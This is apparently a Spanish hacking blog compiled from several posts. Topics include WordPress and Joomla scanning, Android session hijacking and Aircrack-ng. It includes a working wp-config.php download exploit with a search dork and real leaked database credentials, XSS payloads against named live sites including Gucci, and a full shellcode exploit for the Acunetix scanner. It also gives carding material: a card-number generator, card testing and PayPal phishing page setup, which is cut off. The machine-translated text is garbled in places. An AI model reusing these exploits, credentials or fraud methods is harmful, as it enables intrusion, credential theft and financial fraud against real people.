HACKER ANGELWHITE GALC

viernes, 25 de julio de 2014

Auditando Web site de Wordpress con Plecost




Esta Herramienta esta diseñada para Analizar los Plugins instalado en un sitio web en Wordpress, para un Pentester sabe que la mayor parte de las vulnerabilidades se encuentran en los plugins,  esta herramienta tiene como proposito a ayudar a identificar cada modulo esta herramienta :

Options:

 
-n            : Number of plugins to use (Default all - more than 7000).
   
-c            : Check plugins only with CVE associated.
   
-R file      : Reload plugin list. Use -n option to control the size (This take several minutes)
   
-o file      : Output file. (Default "output.txt")
   
-i file       : Input plugin list. (Need to start the program)
   
-s time    : Min sleep time between two probes. Time in seconds. (Default 10)
   
-M time   : Max sleep time between two probes. Time in seconds. (Default 20)
   
-t num    : Number of threads. (Default 1)
   
-h           : Display help. (More info: http://iniqua.com/labs/)


El Plecost lo  podemos hallar en el Sistema Operativo Backtrack 5  R3 , vamos a la accion abriremos la terminal

Código: [Seleccionar]
cd /pentest/web/plecost
./plecost-0.2.2-9-beta.py -i wp_plugin_list.txt -s 12 -M 30 -t 20 -o results.txt http://192.168.48.1/wordpress


Una ves ejecutado dejaremos que teste unos segundos y poco a poco nos arrojara los Plugins instalados en dicho sitio web


Entonces yo entrare al plugins videojs-html5-video-player-for-wordpress aver si encuentro algo de utilidad :


hasta el momento todo normal, pero nos vota los directorios y archivos en dicho plugins, entonces lo que hare sera entrar al archivo " admin.php"


Error encontrado listo para ser explotado el exploit lo podemos encontrar en la siguiente direccion

Link :

Saludos

Escaneando con Websecurify

En esta Oportunidad  vamos a aprender a auditar paginas web con  " Websecurify "
Websecurity  es un Software diseñado para encontrar diferentes tipos de errores de paginas web
en varias de sus funciones es muy cómodo y fácil de usar :


Bueno Vamos a ejecutarlo de la siguiente manera  en la Terminal así :
como vemos en la Terminal esta abriendo el programa :

Código: [Seleccionar]
cd/pentest/web/websecurify
./runner

Ahora nos aparecerá la  plataforma gráfica del Escam
Es Fácil de Usar en la barra de arriba vamos a poner la Url, de la web que vamos a escanear le vamos a dar
"Enter " y saldra ese cuadro con ese logo de "Atención " Nosotros Vamos a tachar ese cuadro y darle
"Continue"



Como vemos ya empezó a escanear la web  vamos ver las resultados en pleno proceso le damos  Clip en el tercer cuadro de la parte izquierda " El logo de una pequeña Escala " , y nos vota los resultados que esta realizando en pleno proceso



Como vemos, nos muestra la información hallada con los errores complementarios.

link : https://www.websecurify.com/

Auditando vulnerabilidades de WordPress

aludos, sin mas os dejo el video que hizo un amigo  hace tiempo sobre como conocer las vulnerabilidades y algo de informacion de un sitio que use como CMS WordPress

https://www.youtube.com/watch?v=FEBm1l9pDxY

Auditando Servidores Web Joomla con Metasploit



Muchas veces cuando realizamos alguna Auditoria enfocada hacia Servidores Web, uno de los pasos mas importante que se debe realizar es Information Gathering (Recopilación de Información)  ya que esta es el paso más crítico de una prueba de seguridad de aplicaciones web que puede llevarse a cabo de muchas maneras diferentes, mediante el uso de herramientas públicas (motores de búsqueda), escáners, envío de simples peticiones HTTP o solicitudes especialmente diseñadas.

Cuando se Audita un Servidor Web Joomla, siempre es muy necesario obtener información exacta sobre que versión se encuentra instalada en el servidor, como también los Plugins instalados, esto nos ayudara mucho a determinar que Exploit debemos usar, o ver la manera exacta de explotar las vulnerabilidades, ya que una de las "mejores" formas de ingresar a un Joomla es mediante las vulnerabilidades que se encuentran en los Plugins.

Por ello, en esta entrada se mostraran los 3 módulos que se integran en Metasploit (Joomla Page Scanner, Joomla Plugin Scanner y Joomla Version Scanner) que nos ayudaran mucho a realizar este paso tan importante en nuestras Auditorias.


En primer lugar, abrimos nuestro msfconsole y tecleamos search Joomla, esta nos mostrara los 3 módulos disponibles para Auditar servidores web Joomla.



Lo primera información que debemos obtener es la versión instalada en la aplicación  por ello utilizaremos el modulo Joomla Version, utilizando los siguiente comandos:

-------------------------------------------------------------------------------------------------------------
use auxiliary/scanner/http/joomla_version
set RHOSTS www.sitio-web.com
run
-------------------------------------------------------------------------------------------------------------




En este paso hemos obtenido la información exacta sobre la versión que esta corriendo en dicha aplicación web (Joomla Version: 2.5.0) , como tambien el S.O.

Seguidamente utilizaremos el modulo Joomla Pages, esta analizara las paginas instaladas en la aplicación web, para tal caso utilizaremos los siguientes comandos:

-------------------------------------------------------------------------------------------------------------
use auxiliary/scanner/http/joomla_pages
set RHOSTS www.sitio-web.com
run
-------------------------------------------------------------------------------------------------------------




En este paso solo se obtuvieron 3 resultados, como es el robots.txt que en la mayoría de Joomla se encuentran, y obviamente la pagina /administrator/ que nos permitirá ingresar al sistema con las credenciales correctas.

Y bueno en este ultimo modulo Joomla Plugins, obtendremos todos los Plugins instalados en la aplicación web, incluido con las vulnerabilidades de Sql Injection y LFI que se puedan encontrar en cada plugin.

-------------------------------------------------------------------------------------------------------------
use auxiliary/scanner/http/joomla_plugins
set RHOSTS www.sitio-web.com
run
-------------------------------------------------------------------------------------------------------------



Como se puede apreciar, se obtuvieron todos los plugins que cuenta dicha aplicación web, por tanto a partir de allí  podremos realizar nuestra auditoria mas a fondo, en busca de exploits para cada plugin obtenido.

Después de haber Auditado la Aplicación Web con estos 3 módulos que nos ofrece Metasploit, también es posible ejecutar 3 comandos mas (hosts, services, notes), que nos permitirá obtener información sobre IP's, nombres del Sistema Operativo que utiliza como también los puertos y servicios.




Por ultimo, el comando notes, nos mostrara toda la información obtenida durante la Auditoria que hemos realizado ejecutando los 3 módulos.



Existen muchas otras herramientas y métodos que nos permite obtener toda esta información, pero no siempre falta saber alguna que otra como este simple tutorial.

Robo de sesiones con Androides

El robo de sesión o Session hijacking es un ataque que consiste en, sin conocer las credenciales de acceso de un usuario (alias y contraseña por poner un ejemplo), conectarse a su sesión en una web y suplantarle.

  En esta entrada comentaremos como llevar a cabo esta "oscura" tarea desde un androide (el dispositivo Android, no un robot).
  Para ello utilizaremos dos herramientas disponibles en Bugtroid (compendio de herramientas que ya comentamos en una entrada anterior). Éstas son DroidSheep y DroidSniff, ambas bajo licencia GPL v3 y tienen, como requisito indispensable, tener nuestro dispositivo rooteado.





  La primera es DroidSheep (supongo que en recuerdo a firesheep) aunque no está disponible en su web para descargar (problemas legales). Para obtenerla podemos tirar de Bugtroid o compilar su código fuente pues posee licencia GPL como hemos comentado antes (yo he optado por la primera opción).

  Su interfaz es muy simple, basta con lanzarlo y pulsar el botón Start, con lo que, mediante un ataque de arp-spoofing, empezará a capturar sesiones en la red:



A partir de aquí solo queda pulsar sobre la sesión capturada y suplantarla:








 DroidSniff es la segunda opción, originada en los foros de XDA nos ofrece las mismas posibilidades que la anterior. Su instalación, al igual que DroidSheep es posible desde Bugtroid (sección de sniffers), aunque también podemos descargarla del foro o compilarla.

  El funcionamiento, igual que antes, basta con que pulsemos Start y la aplicación hará todo el trabajo:





El mejor manual de ataques de Aircrack-ng


Es muy difícil encontrar un manual como este, en español y con todos los ataques bien explicados, los que lo tienen no lo dan fácilmente, hay como un temor generalizado como a estar haciendo algo ilegal, cuando Aircrack-ng es totalmente legal, lo bajas de las web mas famosas de descarga de software oficial, es totalmente didáctico y es parte de la auditoria de seguridad de una red WI-FI.

Este manual no tiene derechos de autor y fue hecho por alguien que se tomo el duro trabajo de hacerlo bien. Es un fichero PDF muy pequeño (213 KB) pero todo lo que tiene es ENORME por la calidad de información. Lo encontré de casualidad cuando ni siquiera lo buscaba, lo tengo guardado desde hace un tiempo, pero nunca aplique los ataques al no tener el hardware necesario, presiento que funcionará al 100 %.

Curiosamente el manual comienza por lo mas difícil, explicando la inyección de paquetes y sus ataques, para dedicarle desde la mitad del manual en adelante, a la explicación detallada y precisa del Aircrack-ng y demás comandos, luego sigue con una descripción detallada del método para descifrar la clave, las opciones de cada comando están siempre muy bien explicadas.

Esto es parte de su contenido:

INYECTAR PAQUETES

Aireplay-ng se usa para inyectar paquetes.

Su función principal es generar tráfico para usarlo más tarde con Aircrack-ng y poder crackear claves WEP y WPA-PSK.

La mayoría de los drivers tienen que estar parcheados para ser capaces de inyectar paquetes

Hay varios ataques diferentes que se pueden utilizar para hacer deautenticaciones con el objetivo de capturar un handshake WPA, para realizar una falsa autenticación, un reenvío interactivo de un paquete, o una reinyección automática de un ARP-request.

Con el programa packetforge-ng es posible crear paquetes ARP request de forma arbitraria.


Actualmente se pueden realizar cinco ataques diferentes:

 Ataque 0: Deautenticación
 Ataque 1: Falsa autenticación
 Ataque 2: Selección interactiva del paquete a enviar
 Ataque 3: Reinyección de una petición ARP (ARP-request)
 Ataque 4: Ataque chopchop
 Ataque 5: Ataque de Fragmentación

http://www.sendspace.com/file/m2h8jt

Chrome Password Decryptor



Chrome Password Decryptor es la herramienta gratis para recuperar instantáneamente las contraseñas almacenadas de Google Chrome navegador.
Se detecta automáticamente la ruta del perfil de Chrome por defecto para el usuario actual y muestra todas las contraseñas de inicio de sesión almacenadas en texto claro después de descifrarlos.

Otra característica útil de esta herramienta es la opción Guardar que se puede utilizar para guardar los secretos de acceso al archivo local en formato HTML / XML / Texto estándar. Esto será muy útil en los casos siguientes :

* Para tener copia de seguridad de los secretos de inicio de sesión para los sitios web almacenados
* Para transferir los secretos de un sistema a otro.
* Para almacenar las contraseñas de sitios web en la ubicación centralizada más segura
* Para recuperar las contraseñas en caso de que Chrome no se hace accesible o no funcional.


dowload: http://securityxploded.com/download-file.php?id=4521

Explotando Vulnerabilidades de Wordpress




Saludos nuevamente mis queridos y fieles lectores de este humilde blog, en esta oportunidad  tocaremos el tema sobre la explotación de un "cms" como Wordpress, mediante los exploit's de url en los sectores vulnerables o débiles de privilegios

Exploit

Local File Download Wordpresss

La vulnerabilidad archivo de descarga de servidor local, nos permite descargas contenido de información de base de datos las cuales el atacante puede aprovechar para la penetración el servidor web de una manera fácil y rápida 

Dork

inurl:/wp-content/plugins/wp-filemanager/ site:.com

Exploit :

/incl/libfile.php?&path=../../&filename=wp-config.php&action=download


Ejemplo de ataque :

Link de la web la cual ingresaste el dork " http://www.wildrift.com/wp-content/plugins/wp-filemanager/" , luego de ello introducirás lo siguiente " /incl/libfile.php?&path=../../&filename=wp-config.php&action=download "

Como vemos en la imagen, podemos ver que al introducir el exploit , automáticamente nos descarga el archivo config.php, bien lo guardaremos



Archivo "config.php"



 INFORMACIÓN DE  BD

('DB_USER', 'wildri8u_advent');

/** MySQL database password */
define('DB_PASSWORD', 'xa.+(&]AUyrR');

/** MySQL hostname */
define('DB_HOST', 'localhost');


 Exploit

 Cross Site Scripting

Como todos sabemos lo que es un error " Cross Site Scripting  " , no es necesario que lo diga en este párrafo, pero dejare la referencia de ello en este link :
http://backtrack-omar.blogspot.com/2013/02/cross-site-scripting-xss.html


Bueno prosigamos, en el modulo de plugins "Plugin NextGen," , se ah descubierto que este complemento tiene un  grave error de "XSS", la cual puede ser aprovechado para varios tipos de ataques dirigidos de cualquier persona que tenga conocimientos de cada uno de ellos.


Dork :

inurl:/wp-content/plugins/wp-filemanager/ site:.com

Exploit :

/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert('X4r0r-MostSecurity');//

Ejemplo :

drfranklipman.com/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert('backtrack-omar.blogspot.com');//

Acunetix 0day Traducido en Español

Pwn los n00bs - Acunetix 0 días
Hace unas semanas he publicado un artículo sobre WINRAR 0day .
Ese artículo reveló una nueva vulnerabilidad que dio atacantes , la capacidad de realizar ataque de suplantación.
Muchas personas me escribieron acerca de los problemas de ese tipo de artículo ( por ejemplo).
Así que esta vez estoy Goanna revela un nuevo 0day que ayudará a los administradores de seguridad para proteger sus sitios web en contra de muchos escaneos de vulnerabilidades .
Una gran cantidad de sitios de propietarios le dirá que los números de la mayoría de las exploraciones , realizadas en contra de sus sitios , se llevan a cabo por herramientas automáticas como NESSUS , Acunetix y AppScan .
Hoy 0 días se centrará en uno de la exploración web más popular del mundo , Acunetix .
El POC será contra Acunetix 8 (build 20120704 , ya que es una de la versión más común agrietada que se publicó en la red y utilizado por muchos hackers novatos ) .
Esta revelación no sólo revelará una nueva vulnerabilidad , pero demuestra una percepción completamente nueva de tratar con los ataques externos .
En lugar de proteger sus sitios web una y otra vez , o la compra de un nuevo WAF avanzada ( firewall de aplicaciones web), vamos a darle a los atacantes una razón para tener miedo , por lo que pensar dos veces antes de que se pulse el botón de "SCAN " .
En este artículo no voy a dar un trabajo completo explotar para todos los escenarios de exploración ni para todos los sistemas operativos , pero una prueba de concepto que se espera que crezca en un nuevo esfuerzo de investigación para las vulnerabilidades de las herramientas de prueba de penetración .



Acunetix es una poderosa herramienta para el análisis y la búsqueda de vulnerabilidades en sitios web.
Muchos atacantes novatos tienden a usar esta herramienta debido a la simplicidad de su uso.
Acunetix ofrece a sus usuarios un simple escaneo de base asistente que cubre muchos aspectos del análisis de vulnerabilidades.
Uno de los aspectos es la capacidad de escanear más dominios o subdominios relacionados con el sitio web de escaneado.
Por ejemplo, si escaneamos mi blog "http://an7isec.blogspot.co.il", obtendremos el resultado se muestra a continuación:



Después de investigar un poco acerca de esta opción, me di cuenta de que Acunetix inicia su asistente mediante el envío de una petición HTTP al sitio y aprender sobre él a partir de su respuesta HTTP.
Además el asistente aprende sobre los dominios relacionados externos de las fuentes externas que aparecen en el sitio web, por ejemplo:
"<img Src=http://externalSource.com/someimg.png>"
"<a Href=http://externalSource.com/> </ a>"
  Etc. ..

Análisis detallado revela que si uno de la longitud del nombre de dominio externo es más de 268 Byte de, Acunetix se estrelló, por lo que si queremos provocar un accidente, lo único que tenemos que hacer es poner algún tipo de fuente externa en nuestro sitio, que tener la longitud de 268 bytes de o más, decir algo como esto :
Código: [Seleccionar]
<A href= “http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA”> 

Vista rápida de esta aplicación en el depurador Inmunidad revela que EDX fue corrompido por la cadena de formación de pelusa que causó violación de acceso:



A pesar de que aún la escritura corre sobre la imposición de controlador estructurado ( SEH ) que probablemente se dará cuenta , mi consejo para ti es no ir por ese camino , créeme que lo intenté durante varios días sin éxito ( debido al mecanismo SHE segura ) .

Sin embargo, tenemos otro problema con este exploit , en una palabra , "ASCII" .
Acunetix obtiene su información sobre los dominios externos como una dirección URL.
Este hecho provoca que la cadena se convierte en explorador Web cordaje no daña .
Mientras ASCII acepta caracteres como :
0x22 ( ") , 0x23 (#), 0x24 ($), 0x25 (%), 0x5C (\), 0x2F (/) y más ...

Cadena URL acepta sólo caracteres alfanuméricos imprimibles y URL convierte caracteres especiales (con pocas excepciones).
Así que si mi fuente externa contiene uno de los caracteres especiales , que se convertirán en
"% ALGO " .
Por ejemplo, el carbón "comillas" (") se convertirá en 253.232 en la memoria porque es la traducción de 22 % .

Otro ejemplo que demuestra la codificación URL es: char "por ciento" (% ), que se convierte en 253.235 en la memoria.
Sin pasar por él, será mediante la construcción de un exploit que sólo contiene "AZ , az, 1-0 " caracteres y unos caracteres especiales que no se convierten en el proceso de URL ENCODE como :
 " ! () = } {" .
(no es un trabajo sencillo en absoluto)

En resumen, que tenía que encontrar una manera de arreglar el flujo de la aplicación con el fin de evitar la SEH basado explotar (debido a la imposibilidad de eludir la protección de seguro SHE con cadenas URL ASCII solamente).

Por último , he encontrado una manera .
Con el fin de fijar el caudal, EDX tuvo que ser sobreescrito con una dirección de memoria legible.
Sin embargo, es importante recordar que EDX no se ha utilizado como es, pero menos 8
Código: [Seleccionar]
MOVE ECX, DWORD PTR DS: [EDX-8];

Lo que significa que no importa qué dirección de memoria que utilizamos, hay que añadir 8 a la dirección (en la explotación), convertir toda la dirección en imprimir String url, y esperamos lo mejor.

Después poco de investigación, encontré tal dirección.
La dirección estaba en "0x663030XX" y por suerte tenía la posibilidad de convertirse en el URL de cuerda sin caracteres especiales del malo -> "F005".
Después de jugar con el código me encontré con que la ubicación exacta de ese EDX sobrescribir, es a 268 Offset de byte de.
Así que por ahora nuestro exploit se ve así:
Código: [Seleccionar]
<img src=”http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA500fBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB”>


Running ACUNETIX's scan against that payload, caused the next result:




Como se puede ver arriba, la EIP se ha sobrescrito!
Parece que la idea de fijar el flujo se ha realizado correctamente, ya que me permitió estar en una mejor posición de ataque (EIP sobrescribir).
Junto a ella, nuestro espacio potencial para el código shell se presenta ahora en EAX y ESP.
Cuando se trata de la decisión de la elección de ESP o EAX, ESP es una mejor opción a partir de dos aspectos diferentes:

Uno, ESP está apuntando directamente al principio de la cadena de la cáscara.

Dos, hay mucho más espacio para un código shell grande para ser escrito.

Después elegí ESP, necesitaba encontrar una instrucción de "JMP ESP" en una dirección de memoria que podría escribirlo cadena URL (ASCII limitada como mención arriba).
La dirección deseada fundado con éxito en la localización de: 0x7e79515d (Sxs.dll) -
(En ASCII "] Qy ~").

Después de todo eso, nuestro código shell supone que se vea así:
Código: [Seleccionar]
<img src=”http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA500fBBBB]Qy~BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB”>
  

500f = 0x66303035: localización de memoria legible para fijar el flujo de la aplicación que fue corrompido por el desbordamiento de búfer.
] Qy ~ = 0x7e79515d (JMP ESP de Sxs.dll).


Bueno, en este momento estamos en la etapa semifinal, que ejecuta la aplicación en contra de la carga útil más arriba, produce el siguiente resultado:



Yea ... aterrizamos exactamente al principio de la carga final.


El siguiente paso será el uso de la cáscara de Windows adecuado que se realizará sólo de cadena URL (ASCII limitada).
Dicha carcasa se ​​puede generar con "Metasploit" y se llama "alfanumérico Shell".
Lo importante a recordar durante el uso de tal carga útil, es que la dirección de inicio de la carga debe ser presentada en uno de los registros. Si la carga se presenta en el ESP, el primer código de operación de la concha tiene por qué ser "PUSH ESP".
En mi prueba de concepto, usé simple "CALC.EXE" shell code generado por "Metasploit que me llevó a la etapa final que es, trabajar explotar!
Por otra parte, nuestra debilidad es sin pasar con éxito la protección DEP, simplemente seleccionando sólo las direcciones que no se compilan con DEP.
Y debido al hecho de que la propia Acunetix no se cumple con el DEP, este exploit debería funcionar perfectamente en Windows XP.


Después de alcanzar con éxito todos nuestros objetivos, vamos a ver en el trabajo final explotar:
Código: [Seleccionar]
<img src="http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA500fBBBB]Qy~TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB
0BBXP8ACJJIHZXL9ID414ZTOKHI9LMUKVPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9
JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMMPV261UKL71ME2NMP7FQY0NOHKP
KZUDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7ZUXDDXZSOMKL4SQK
UNKMJPOOCRODCMDKR0PGQD0EYIRVMHUZJDOGTUV2WP3OIVQ1QJSLSKGBLYKOY7NWWLNG6
LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQK15X
UXYUNP1BPF4X6PZIVOTZPJJRUOCC3KD9L034LDOXX5KKXNJQMOLSJ6BCORL9WXQNKPUWN
KRKJ8JSNS4YMMOHT3ZQJOHQ4QJUQLN1VSLV5S1QYO0YA”>

Tenemos que recordar que para poder disfrutar de nuestro exploit, el hacker novato debe comprobar nuestro nombre de dominio adicional, en la lista de los dominios adicionales en ventana del asistente Acunetix.
¿Qué podemos hacer para hacer que nuestro nombre de dominio atractivo?
Pensando en ello, se me ocurrió con dos ideas:

1: escribir un nombre de dominio de intentar que hará que los hackers comprobar ese dominio, como, ADMIN.ControlMangment.1249874350345.An7isec.blogspot.co.il.

2: uso de varios dominios externos con los siguientes nombres:

"SQLINJECTION"
"XSS"
"CSRF"
Y así sucesivamente ...

Este tipo de nombres, probablemente le dará el ojo del pirata informático la sensación de que la ventana de la lista de dominio es en realidad una ventana de opciones.
El abajo el código escrito demuestra que tipo de engañoso:
Código: [Seleccionar]
<html>
<img src="http://SQLInjection........................................
.....................................................................
.....................................................................
............AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA500fBBBB]Qy~TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB
0BBXP8ACJJIHZXL9ID414ZTOKHI9LMUKVPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9
JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMMPV261UKL71ME2NMP7FQY0NOHKP
KZUDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7ZUXDDXZSOMKL4SQK
UNKMJPOOCRODCMDKR0PGQD0EYIRVMHUZJDOGTUV2WP3OIVQ1QJSLSKGBLYKOY7NWWLNG6
LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQK15X
UXYUNP1BPF4X6PZIVOTZPJJRUOCC3KD9L034LDOXX5KKXNJQMOLSJ6BCORL9WXQNKPUWN
KRKJ8JSNS4YMMOHT3ZQJOHQ4QJUQLN1VSLV5S1QYO0YA”>

<img src="http://XSS.................................................
.....................................................................
.....................................................................
...">

<img src="http://CSRF................................................
.....................................................................
.....................................................................
....">

<img src="http://DeepScan............................................
.....................................................................
.....................................................................
........">

<img src="http://NetworkScan.........................................
.....................................................................
.....................................................................
...........">

<img src="http://DenialOfService.....................................
.....................................................................
.....................................................................
...............">

</html>



En conclusión,

Después de todo lo anterior, hemos creado una poderosa explotar que los hackers Newbie
sin duda enamorarse de.
Este exploit nos dará la capacidad de hacer todo con todo lo que los hackers desagradables Novato que escanean nuestros días los sitios y la noche, matando a nuestro tráfico, llenar todos los formularios del sitio web de basura y así sucesivamente ...
Además, puede ser utilizado con el fin de reunir información de inteligencia inteligente sobre las fuerzas hostiles que quieren atacar nuestra aplicación web.

PERO!
La más poderosa idea que me motivó a revelar este concepto y POC, es el hecho de que este exploit es asesino anonimato! , Porque incluso si el atacante utiliza el proxy inteligente y seguro más en el mundo, como "TOR" y otros, su culo se dará a conocer y el pleno control de su máquina de escáner se ganará.

Gracias a todos por leer mi post, espero que os guste,
Buena caza, An7i

PD
Aquí hay un video de explotar plenamente funcional y script en Perl que genera costumbre explotar:


Link del video : https://www.youtube.com/watch?v=ifv9fRzVEzw

XSS] Gucci

Hola, aquí les dejo un XSS (Cros-Site Scripting) que encontré en Gucci pues simplemente les dejo el PoC
Vector -> http://www.gucci.com/es/search?query=%3CIMG+SRC%3D%2F+onerror%3D%22alert(String.fromCharCode(83,%20113,%20117,%20105,%20100,%2032,%2045,%2032,%2066,%20108,%2097,%2099,%20107,%2076,%2097,%20115,%20116,%2032,%2083,%20101,%2099))%22%3E%3C%2Fimg%3E

En el query inyectais cualquier código javascript y se ejecutará en bruto piensen que hacen con el ;)
Un saludo

Generador de Bins carding



Saludos gente bueno en esta oportunidad dejare un generador de bin's , fue libero hace por lo menos 2 a 3 meses por su creador
sin mas que decir les dejo unas fotos de uso :






Debemos poner el BIN  los primeros 6 dígitos nada mas por ejemplo utilizare el siguiente bin :

cinepolis 411215xxxxxxxxxx     
Fecha de Vencimiento : 6/17
ccv 217

Pondremos solamente el "Bin" y añadiremos el numero de css que deseamos obtener y automaticamente les saldran :



Código: [Seleccionar]
http://www.mediafire.com/download/tt8d0jsbd8eam53/generador+en+base+a+bin+GC.exe

BIN para novatos by hancktack

Hola buenos días soyhanckdel team LulzSecMéxico hoy tengo para ustedes un pequeñe post que encontre en la web Android-Latino,creditos a quien corresponda espero que lo disfruten.

¿Qué es BIN?
Numero de Identificación Bancario (Ingles: Bank Identication Number)
Cuando tomas una tarjeta bancaria puedes notar que tiende a constar de 15-16 números y estos varían dependiendo del banco o compañía que la emitió.


el primer dígito es el tipo de categoría de la tarjeta los 3 más comunes son:
3  -  AMERICAN EXPRESS (Su tarjeta solo cuenta con 15 números)
4  -   VISA
5  -  MASTERCARD

Los primeros 5 números más el primer dígito es el BIN, eh identifica el tipo de tarjeta, la cuenta o el banco que la emite
Al último número se le conoce como numero verificador y después de algunas operaciones matemáticas este número regularmente da una sumatoria de números enteros.
En la parte inferior de la tarjeta veremos la vigencia siempre compuesta por  4 dígitos:
XX / XX
Que corresponden al Mes y al Año.
Y por último el CVV/CVV2 y es una clave de 3 o 4 dígitos, generada como pin de seguridad, de las mencionadas con anterior solo American Express usa 4 dígitos.
Actualmente el CVV/CVV2, se genera según los protocolos de cada emisor, antes era una combinación de dígitos de toda la tarjeta, eso cambio por seguridad, si necesitas mas información de la estructura de una tarjeta o de un BIN puedes checarla aquí: http://sabiduriadeescalera.com/3310/

quí puedes consultar algunos BINs que algunas empresas o entidades aceptan.
MEXICO
http://www.aig.com.mx/chartis/internet/mx/es/BIN%20List_tcm3218-475105.pdf
PANAMA
http://www.superbancos.gob.pa/es/regulaciones2
POLONIA
http://espanol.bzwbk.pl/_items/bzwbk.pl/pdf/tarifa_de_tasas_y_comisiones.pdf

Para evitar el fraude de este tipo, hay empresas que se dedican a vender las características de estas BIN con estándares de calidad muy altos, aunque esto no tiene un filtro dichas bases de datos se pueden obtener en diversos sitios.

¿Cómo se usan los BINs?
Los BIN por si solos son inofensivos hasta cierto grado aunque ponen en evidencia gran característica de las tarjetas, para que alguien use inadecuadamente tiene que GENERAR TARJETAS, todo basado en patrones.


Si deseas más información acerca de cómo se generan puedes visitar:
http://www.mobilefish.com/services/credit_card_number_generator/credit_card_number_generator.php

Después de ver como se utilizan o se tratan estos datos, solo queda probar las Tarjetas, muchos especialistas sugieren que estas son probadas en sitio que otorgan Servicios de forma gratuita con la solo suscripción con un medio de pago como la Tarjeta de Crédito.

Hasta el siguiente post y HAPPY HACKING!!!

Tutorial de Carding y sus metodos de ataque



Últimamente se esta poniendo muy de moda el tema de el " Carding"" a nivel de todo latino América, no hay que ser un profesional ni siquiera  un "Hacker" como dicen muchos por concepto erróneo de este tipo de método  , ya que eh visto a muchas personas que nisiquiera saben hacer un simple " ByPass" or Sql inyeccion metodo POST en los risk entre otros payloads de una simple herramienta como "Sqlmap" o ni muchos menos saben utilizar "Mfsconsole", digo esto porque es la realidad y soy de las personas que digo las cosas como son .

Antes de comenzar los métodos de ataque de este escenario , quiero aclarar que no enseñare a utilizar un proxy u algo, ya que ese post lo tienen en mi "BLOG" , guerra revisada no mata gente bueno sigamos :


SCAMS  + Mailers Spammer

En este tema tocaremos sobre la plataforma que trabaja el carder y como nosotros podemos tener la nuestra  de una manera  tan sensilla

Pasos  :

   1- Tener un scams actualizado de paypal :
   2-Tener un Cpanel para subirlo al servidor

 Una ves obtenido estos dos requisitos, vamos a subir nuestro scam mediatnte el "upload" del Cpanel en la opcion " cargar " debemos comprimir nuestro scam en extension " .zip " para que lo descomprima sin ningun problema luego de ello una vez subido nuestro scam :





